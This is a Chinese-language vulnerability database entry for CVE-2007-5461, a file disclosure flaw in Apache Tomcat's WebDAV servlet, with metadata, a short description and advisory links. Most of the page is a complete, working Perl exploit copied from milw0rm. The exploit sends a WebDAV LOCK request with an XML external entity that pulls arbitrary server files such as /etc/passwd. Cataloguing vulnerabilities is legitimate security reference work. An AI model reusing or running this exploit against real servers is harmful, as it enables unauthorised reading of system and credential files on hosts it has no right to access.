Apache Tomcat WebDav远程信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113797 漏洞类型 路径遍历
发布时间 2007-10-14 更新时间 2009-06-28
CVE编号 CVE-2007-5461 CNNVD-ID CNNVD-200710-294
漏洞平台 Multiple CVSS评分 3.5
|漏洞来源
https://www.exploit-db.com/exploits/4530
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200710-294
|漏洞详情
ApacheTomcat是一个流行的开放源码的JSP应用服务器程序。ApacheTomcat在特定配置情况下存在漏洞,远程攻击者可能利用此漏洞非授权读写文件。如果将ApacheTomcat的WebDAVservlet配置为同上下文使用且允许写访问的话,则远程攻击者可以通过提交指定了SYSTEM标签的WebDAV请求导致泄露任意文件的内容。
|漏洞EXP
#!/usr/bin/perl
#******************************************************
# Apache Tomcat Remote File Disclosure Zeroday Xploit
# kcdarookie aka eliteb0y / 2007
#
# thanx to the whole team & andi :)
# +++KEEP PRIV8+++
#
# This Bug may reside in different WebDav implementations,
# Warp your mind!
# +You will need auth for the exploit to work...
#******************************************************

use IO::Socket;
use MIME::Base64; ### FIXME! Maybe support other auths too ?

# SET REMOTE PORT HERE
$remoteport = 8080;

sub usage {
	print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n";
	print "kcdarookie aka eliteb0y / 2007\n";
	print "usage: perl TOMCATXPL <remotehost> <webdav file> <file to retrieve> [username] [password]\n";
	print "example: perl TOMCATXPL www.hostname.com /webdav /etc/passwd tomcat tomcat\n";exit;
}

if ($#ARGV < 2) {usage();}

$hostname = $ARGV[0];
$webdavfile = $ARGV[1];
$remotefile = $ARGV[2];

$username = $ARGV[3];
$password = $ARGV[4];

my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
                              PeerPort => $remoteport,
                              Proto    => 'tcp');
                              
$|=1;
$BasicAuth = encode_base64("$username:$password");

$KRADXmL = 
"<?xml version=\"1.0\"?>\n"
."<!DOCTYPE REMOTE [\n"
."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n"
."]>\n"
."<D:lockinfo xmlns:D='DAV:'>\n"
."<D:lockscope><D:exclusive/></D:lockscope>\n"
."<D:locktype><D:write/></D:locktype>\n"
."<D:owner>\n"
."<D:href>\n"
."<REMOTE>\n"
."<RemoteX>&RemoteX;</RemoteX>\n"
."</REMOTE>\n"
."</D:href>\n"
."</D:owner>\n"
."</D:lockinfo>\n";

print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n";
print "kcdarookie aka eliteb0y / 2007\n";
print "Launching Remote Exploit...\n";

$ExploitRequest =
 "LOCK $webdavfile HTTP/1.1\r\n"
."Host: $hostname\r\n";

if ($username ne "") {
$ExploitRequest .= "Authorization: Basic $BasicAuth\r\n";	
}
$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . $KRADXmL;

print $sock $ExploitRequest;

while(<$sock>) {
	print;
}

# milw0rm.com [2007-10-14]
|参考资料

来源:FEDORA
名称:FEDORA-2007-3456
链接:https://www.redhat.com/archives/fedora-package-announce/2007-November/msg00525.html
来源:XF
名称:apache-tomcat-webdav-dir-traversal(37243)
链接:http://xforce.iss.net/xforce/xfdb/37243
来源:VUPEN
名称:ADV-2009-3316
链接:http://www.vupen.com/english/advisories/2009/3316
来源:www.vmware.com
链接:http://www.vmware.com/security/advisories/VMSA-2009-0016.html
来源:www.vmware.com
链接:http://www.vmware.com/security/advisories/VMSA-2008-0010.html
来源:SECTRACK
名称:1018864
链接:http://www.securitytracker.com/id?1018864
来源:BID
名称:31681
链接:http://www.securityfocus.com/bid/31681
来源:BID
名称:26070
链接:http://www.securityfocus.com/bid/26070
来源:BUGTRAQ
名称:20091120VMSA-2009-0016VMwarevCenterandESXupdatereleaseandvMApatchreleaseaddressmultiplesecurityissueinthirdpartycomponents
链接:http://www.securityfocus.com/archive/1/archive/1/507985/100/0/threaded
来源:REDHAT
名称:RHSA-2008:0862
链接:http://www.redhat.com/support/errata/RHSA-2008-0862.html
来源:MILW0RM
名称:4530
链接:http://www.milw0rm.com/exploits/4530